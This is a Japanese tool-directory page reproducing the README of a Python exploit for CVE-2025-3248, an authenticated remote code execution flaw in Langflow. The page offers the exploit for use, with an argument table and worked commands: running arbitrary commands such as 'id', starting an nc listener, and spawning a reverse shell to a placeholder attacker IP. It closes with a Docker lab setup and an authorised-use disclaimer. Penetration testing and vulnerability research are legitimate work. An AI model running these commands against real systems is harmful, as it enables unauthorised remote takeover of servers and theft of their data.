Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tiemio/rce-cve-2025-3248
エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

このPythonスクリプトはCVE-2025-3248を悪用して、脆弱なシステム上で任意のコマンドを実行したり、リバースシェルを起動したりします。このエクスプロイトを使用するには認証が必要です。

リポジトリを見る
161年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

認証済みCVE-2025-3248 Langflowリモートコード実行

このPythonスクリプトは、CVE-2025-3248を悪用して、脆弱性のあるシステム上で任意のコマンドを実行したり、リバースシェルを生成したりします。このエクスプロイトを使用するには認証が必要です。


特徴

  • 認証済みコマンド実行: ターゲット上で任意のシステムコマンドを実行します。
  • リバースシェル: リスナーにリバースシェルを生成します。
  • プロキシサポート: プロキシ(例:Burp Suite)を介してリクエストをルーティングします。

必要条件

  • Python 3.x
  • requests ライブラリ

依存関係は次のコマンドでインストールします:

pip install requests

使用方法

python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

引数

引数説明必須
-u, --urlターゲットのベースURL(例:https://target.com)はい
-l, --login管理者ユーザー名はい
-p, --password管理者パスワードはい
-c, --commandターゲット上で実行するコマンドいいえ*
--proxyプロキシURL(例:http://127.0.0.1:8080)いいえ
--lhostリバースシェル用のローカルホストいいえ*
--lportリバースシェル用のローカルポートいいえ*

* コマンド(-c)またはリバースシェル用の--lhostと--lportの両方を指定する必要があります。


使用例

1. コマンドの実行

python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. リバースシェルの取得

あなたのマシンでリスナーを起動します:

nc -lvnp 4444

次に実行します:

python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. プロキシの使用

python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Dockerイメージ

イメージのデプロイ

次のコマンドでDockerイメージをデプロイできます:

podman compose up -d

イメージはhttp://localhost:7860で利用可能になります。 composeファイルのクレジット: このリポジトリ


免責事項

このスクリプトは教育および許可されたペネトレーションテストの目的のみで使用してください。 所有していない、または明示的な許可を得ていないシステムに対して使用しないでください。


このREADMEはAIによって生成されました。

ツールをダウンロード